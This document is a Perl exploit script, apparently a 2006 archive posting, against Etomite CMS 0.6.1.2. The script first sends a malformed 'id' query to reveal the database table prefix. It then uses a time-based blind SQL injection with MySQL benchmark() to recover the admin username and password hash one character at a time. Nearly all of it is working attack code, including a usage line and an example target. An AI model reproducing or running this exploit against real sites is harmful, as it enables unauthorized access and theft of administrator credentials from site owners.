etm_0612_sqlinj.pl.txt
Posted on 18 November 2006
#!/usr/bin/perl -w use IO::Socket; use strict; # Etomite CMS "id" SQL Injection # Version: 0.6.1.2 # Url: http://www.etomite.org # Author : Alfredo Pesoli 'revenge' # Description: # # The "id" parameter isn't properly sanitised before being returned in sql query and can be used to inject craft SQL queries, we can use Blind SQL Injection attack to disclose admin credentials. # # magic_quotes_gpc must be Off # # http://www.0xcafebabe.it # <revenge@0xcafebabe.it> if (@ARGV < 2) { &usage; } my $delay = "1500000"; my $host = $ARGV[0]; my $dir = $ARGV[1]; if ($ARGV[2]) { $delay = $ARGV[2]; } print " Target url : ".$host.$dir." "; $host =~ s/(http://)//; my @array = ("username","password"); print "--== Trying to perform sql injection ==-- "; sleep(1); my $prefix = &disc_prefix(); print "Prefix : $prefix "; &sploit(); sub disc_prefix() { my $prefix = ""; my $val = "index.php?id=1'"; my $data = $dir.$val; my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed "; print $req "GET $data HTTP/1.1 "; print $req "Host: $host "; print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux) "; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $req "Accept-Language: en-us;q=0.7,en;q=0.3 "; print $req "Accept-Encoding: gzip,deflate "; print $req "Keep-Alive: 300 "; print $req "Connection: Keep-Alive "; print $req "Cache-Control: no-cache "; print $req "Connection: close "; while (my $result = <$req>) { if ( $result =~ /404 Not Found/ ) { printf " File not found. "; print " $result "; exit; } elsif ( $result =~ /400 Bad Request/ ) { printf " Bad request. "; print " $result "; exit; } elsif ($result =~ /site_content/) { (my $garb, my $pref) = split /sites*/, $result; (my $gar, my $pre) = split /WHEREs*/, $pref; $prefix = $pre; $prefix =~ s/`//g; } } return $prefix; } sub sploit() { my $x = ""; my $i = ""; my $string = ""; my $res = "1"; for ( $x=0; $x<=$#array; $x++ ) { my $j = 1; $res = 1; while ($res) { for ($i=32;$i<=127;$i++) { $res = 0; if ( $x eq 1 ) { next if ( $i < 48 ); next if ( ( $i > 57 ) and ( $i < 97 ) ); next if ( $i > 102 ); } my $val = "index.php?id=1'"; $val .= "/**/or/**/".$prefix."site_content.id=(select(if((ascii(substring(".$prefix."manager_users.".$array[$x].",$j,1))=$i),benchmark(".$delay.",sha1(13)),0))/**/from/**/".$prefix."manager_users/**/where/**/".$prefix."manager_users.id=1/**/limit/**/1)/**/and/**/'1'='1"; my $data=$dir.$val; my $start = time(); my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed "; print $req "GET $data HTTP/1.1 "; print $req "Host: $host "; print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux) "; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $req "Accept-Language: en-us;q=0.7,en;q=0.3 "; print $req "Accept-Encoding: gzip,deflate "; print $req "Keep-Alive: 300 "; print $req "Connection: Keep-Alive "; print $req "Cache-Control: no-cache "; print $req "Connection: close "; while (my $result = <$req>) { if ( $result =~ /404 Not Found/ ) { printf " File not found. "; print " $result "; exit; } if ( $result =~ /400 Bad Request/ ) { printf " Bad request. "; print " $result "; exit; } } my $end = time(); my $dft = $end - $start; if ( $dft > 4 ) { $string .= chr($i); print " Found : ".chr($i)." "; $res = 1; last; } print " Trying : ".chr($i)." "; } $j++; if ( !$res ) { $array[$x] = $string; $string = ""; } } } print " ---------------------- "; print "Admin username : $array[0] "; print "Admin password : $array[1] "; } sub usage() { print " Etomite 0.6.1.2 'id' SQL Injection Exploit (Admin credentials disclosure) "; print " <revenge@0xcafebabe.it> "; print " http://www.0xcafebabe.it "; print "Usage: $0 <target> <directory> [benchmark_delay] "; print "Example: $0 127.0.0.1 /etomite/ 2000000 "; exit(); }
